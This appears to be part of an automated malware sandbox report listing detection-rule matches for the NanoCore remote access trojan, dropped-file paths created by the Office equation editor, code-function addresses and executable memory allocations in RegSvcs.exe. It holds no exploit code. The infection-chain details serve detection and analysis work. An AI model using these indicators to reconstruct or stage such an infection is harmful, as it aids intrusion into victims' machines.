      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE indicator application name: unknown
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049505A4_2_0049505A
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049012C4_2_0049012C
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_004939984_2_00493998
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_004939A84_2_004939A8
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00493C004_2_00493C00
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00493C104_2_00493C10
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049D6E84_2_0049D6E8
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_004907904_2_00490790
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A5AD19_2_005A5AD1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A3DFF9_2_005A3DFF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005F02B09_2_005F02B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BE0589_2_004BE058
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC0C89_2_004BC0C8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B43A09_2_004B43A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BB4B09_2_004BB4B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B37889_2_004B3788
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC1869_2_004BC186
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B44589_2_004B4458
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049204E89_2_049204E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04923C509_2_04923C50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049245409_2_04924540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049205A69_2_049205A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04920DC09_2_04920DC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049239009_2_04923900
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
